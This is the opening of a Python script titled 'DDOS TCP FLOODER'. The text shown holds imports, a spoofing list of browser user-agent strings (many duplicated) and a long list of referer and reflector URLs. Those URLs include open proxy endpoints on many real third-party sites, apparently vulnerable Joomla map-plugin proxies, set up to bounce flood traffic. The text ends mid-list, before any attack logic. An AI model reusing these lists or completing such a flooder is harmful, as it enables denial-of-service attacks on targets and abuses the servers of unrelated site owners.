# DDOS TCP FLOODER
# v0.0.2

import socket, requests
import random
import threading

useragents=[
"Mozilla/5.0 (X11; U; IRIX64 IP27; en-US; rv:1.4) Gecko/20030711",
"Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025",
"Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020",
"Mozilla/5.0 (X11; U; Linux armv7l like Android; en-us) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/533.2+ Kindle/3.0+",
"Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1",
"Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)",
"Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)",
"Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.4.1)",
"Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.7.12) Gecko/20051013 Debian/1.7.12-1ubuntu1",
"Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.4) Gecko/20030624",
"Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.7.12)",
"Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.8b4)",
"Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8)",
"Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051008 Firefox/1.0.7",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20060205 Galeon/2.0.0 (Debian package 2.0.0-2)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330",
"Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.7.12)",
"Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8",
"Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0",
"Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)",
"Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13",
"Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.5",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14"
]
ref=[
'http://www.bing.com/search?q=',
'https://www.yandex.com/yandsearch?text=',
'https://duckduckgo.com/?q=',
'https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=',
'https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer/sharer.php?u=',
'https://drive.google.com/viewerng/viewer?url=',
'http://www.google.com/translate?u=',
'http://www.bing.com/search?q=',
'http://validator.w3.org/feed/check.cgi?url=',
'http://www.google.com/ig/adde?moduleurl=',
'http://www.gillinghamgurdwara.co.uk/site/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://streamitwebseries.twww.tv/proxy.php?url=',
'http://www.comicgeekspeak.com/proxy.php?url=',
'http://67.20.105.143/bitess/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://bemaxjavea.com/javea-rentals-alquileres/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://centrobrico.net/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://conodeluz.org/magnanet/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://greenappledentaldt.com/home/templates/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://html.strost.ch/dgi/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://kobbeleia.net/joomla/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://krd-medway.co.uk/site/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://minterne.co.uk/mjs/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://old.ucpb.org/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.abs-silos.de/en/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.admksg.ru/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.autoklyszewski.pl/autoklyszewski/mambots/content/plugin_googlemap2_proxy.php?url=',
'http://www.build.or.at/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.caiverbano.it/sito/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.cbcstittsville.com/home/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.ciutatdeivissa.org/portal/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.contrau.com.br/web/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.dierenhotelspaubeek.nl/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.gaston-schul.nl/DU/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://bbtoma.com/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.tajmahalrestaurant.co.za/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://www.yerbabuenacuisine.com/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://www.rinner-alm.com/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://stockbridgetownhall.co.uk/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://mentzerrepairs.com/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://www.tilmouthwell.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://www.homevisionsinc.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://toddlers.nalanda.edu.in/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://cultura-city.rv.ua/plugins/system/plugin_googlemap3_proxy.php?url=',
'http://secret.leylines.info/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://bike-electric.co.uk/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://www.centroaquaria.com/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://agenzia-anna.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://www.gretnadrug.com/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://www.crestwoodpediatric.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://www.oceans-wien.com/plugins/system/plugin_googlemap2_proxy.php?url=;BYPASS',
'http://lavori.joomlaskin.it/italyhotels/wp-content/plugins/js-multihotel/includes/show_image.php?w=1&h=1&file=',
'http://santaclaradelmar.com/hoteles/wp-content/plugins/js-multihotel/includes/show_image.php?w=1&h=1&file=',
'http://www.authentic-luxe-locations.com/wp-content/plugins/js-multihotel/includes/show_image.php?w=1&h=1&file=',
'http://www.keenecinemas.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://www.hotelmonyoli.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://prosperitydrug.com/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://policlinicamonteabraao.com/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.vetreriafasanese.com/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://www.benawifi.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url',
'http://www.valleyview.sa.edu.au/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://www.racersedgekarting.com/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.minterne.co.uk/mjs/plugins/content/plugin_googlemap2_proxy.php?url=?url=',
'http://www.villamagnoliarelais.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://worldwide-trips.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url',
'http://systemnet.com.ua/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://www.netacad.lviv.ua/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://www.veloclub.ru/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://www.virtualsoft.pl/plugins/content/plugin_googlemap3_proxy.php?url=',
'http://gminazdzieszowice.pl/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://fets3.freetranslation.com/?Language=English%2FSpanish&Sequence=core&Url=',
'http://www.fare-furore.com/com-line/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.rotisseriesalaberry.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://www.lbajoinery.com.au/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.seebybike.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://www.copiflash.com/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://suttoncenterstore.com/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://coastalcenter.net/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://whitehousesurgery.org/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.vertexi.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://www.owl.cat/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://www.sizzlebistro.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://thebluepine.com/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://donellis.ie/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://validator.w3.org/unicorn/check?ucn_task=conformance&ucn_uri=',
'http://validator.w3.org/nu/?doc=',
'http://check-host.net/check-http?host=',
'http://www.netvibes.com/subscribe.php?url=',
'http://www-test.cisel.ch/web/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.sistem5.net/ww/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://www.fmradiom.hu/palosvorosmart/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.iguassusoft.com/site/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://lab.univ-batna.dz/lea/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://www.computerpoint3.it/cp3/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://hotel-veles.com/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://klaassienatuinstra.nl/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.google.com/ig/add?feedurl=',
'http://anonymouse.org/cgi-bin/anon-www.cgi/',
'http://www.google.com/translate?u=',
'http://translate.google.com/translate?u=',
'http://validator.w3.org/feed/check.cgi?url=',
'http://www.w3.org/2001/03/webdata/xsv?style=xsl&docAddrs=',
'http://validator.w3.org/check?uri=',
'http://jigsaw.w3.org/css-validator/validator?uri=',
'http://validator.w3.org/checklink?uri=',
'http://qa-dev.w3.org/unicorn/check?ucn_task=conformance&ucn_uri=',
'http://www.w3.org/RDF/Validator/ARPServlet?URI=',
'http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http://www.w3.org&xslfile=',
'http://www.w3.org/services/tidy?docAddr=',
'http://validator.w3.org/mobile/check?docAddr=',
'http://validator.w3.org/p3p/20020128/p3p.pl?uri=',
'http://validator.w3.org/p3p/20020128/policy.pl?uri=',
'http://online.htmlvalidator.com/php/onlinevallite.php?url=',
'http://feedvalidator.org/check.cgi?url=',
'http://gmodules.com/ig/creator?url=',
'http://www.google.com/ig/adde?moduleurl=',
'http://www.cynthiasays.com/mynewtester/cynthia.exe?rptmode=-1&url1=',
'http://www.watchmouse.com/en/checkit.php?c=jpcheckit&vurl=',
'http://host-tracker.com/check_page/?furl=',
'http://panel.stopthehacker.com/services/validate-payflow?email=1@1.com&callback=a&target=',
'http://www.viewdns.info/ismysitedown/?domain=',
'http://www.onlinewebcheck.com/check.php?url=',
'http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL=',
'http://www.translate.ru/url/translation.aspx?direction=er&sourceURL=',
'http://streamitwebseries.twww.tv/proxy.php?url=',
'http://www.comicgeekspeak.com/proxy.php?url=',
'https://www.google.com/search?q=',
'https://check-host.net/',
'https://www.facebook.com/',
'https://www.bing.com/search?q=',
'http://netsec-reborn.onion/QuickStresser-virus?id=',
'https://vk.com/profile.php?redirect=',
'https://www.usatoday.com/search/results?q=',
'https://help.baidu.com/searchResult?keywords=',
'https://steamcommunity.com/market/search?q=',
'https://www.ted.com/search?q=',
'https://play.google.com/store/search?q=',
'https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=',
'https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer/sharer.php?u=',
'https://drive.google.com/viewerng/viewer?url=',
'http://www.google.com/translate?u=',
'https://developers.google.com/speed/pagespeed/insights/?url=',
'http://help.baidu.com/searchResult?keywords=',
'http://www.bing.com/search?q=',
'https://add.my.yahoo.com/rss?url=',
'https://play.google.com/store/search?q=',
'http://www.google.com/?q=',
'http://regex.info/exif.cgi?url=',
'http://www.google.com/translate?u=',
'http://translate.google.com/translate?u=',
'http://validator.w3.org/feed/check.cgi?url=',
'http://www.w3.org/2001/03/webdata/xsv?style=xsl&docAddrs=',
'http://validator.w3.org/check?uri=',
'http://jigsaw.w3.org/css-validator/validator?uri=',
'http://validator.w3.org/checklink?uri=',
'http://www.w3.org/RDF/Validator/ARPServlet?URI=',
'http://www.w3.org/2005/08/online_xslt/xslt?xslfile=http%3A%2F%2Fwww.w3.org%2F2002%2F08%2Fextract-semantic.xsl&xmlfile=',
'http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http://www.w3.org&xslfile=',
'http://validator.w3.org/mobile/check?docAddr=',
'http://validator.w3.org/p3p/20020128/p3p.pl?uri=',
'http://online.htmlvalidator.com/php/onlinevallite.php?url=',
'http://feedvalidator.org/check.cgi?url=',
'http://gmodules.com/ig/creator?url=',
'http://www.google.com/ig/adde?moduleurl='
'http://translate.yandex.net/tr-url/ru-uk.uk/',
'http://www.bongert.lu/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://laresmadrid.org/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://doleorganic.com/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://crawfordlivestock.com/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://www.aculaval.com/joomla/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://grandsultansaloon.com/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://www.d1010449.cp.blacknight.com/cpr.ie/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.architettaresas.it/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://basketgbkoekelare.be/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.arbitresmultisports.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://mobilrecord.com/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.dbaa.co.za/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://waggum-bevenrode.sg-bevenrode.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://bwsnt1.pdsda.net/plugins/system/plugin_googlemap3_proxy.php?url=',
'http://www.astecdisseny.com/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.fillmorefairways.com/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.bus-reichert.eu/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://www.maxxxi.ru/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://potholepeople.co.nz/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://www.hammondgolf.com/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://www.footgoal33.com/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://bbtoma.com/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.tajmahalrestaurant.co.za/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://www.yerbabuenacuisine.com/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://www.rinner-alm.com/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://stockbridgetownhall.co.uk/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://mentzerrepairs.com/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://www.tilmouthwell.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://www.homevisionsinc.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://toddlers.nalanda.edu.in/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://cultura-city.rv.ua/plugins/system/plugin_googlemap3_proxy.php?url=',
'http://secret.leylines.info/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://bike-electric.co.uk/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://www.centroaquaria.com/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://agenzia-anna.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://www.gretnadrug.com/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://www.crestwoodpediatric.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://www.oceans-wien.com/plugins/system/plugin_googlemap2_proxy.php?url=;BYPASS',
'http://lavori.joomlaskin.it/italyhotels/wp-content/plugins/js-multihotel/includes/show_image.php?w=1&h=1&file=',
'http://santaclaradelmar.com/hoteles/wp-content/plugins/js-multihotel/includes/show_image.php?w=1&h=1&file=',
'http://www.authentic-luxe-locations.com/wp-content/plugins/js-multihotel/includes/show_image.php?w=1&h=1&file=',
'http://www.keenecinemas.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://www.hotelmonyoli.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://prosperitydrug.com/plugins/content/plugin_googlemap2_proxy.php?url=',
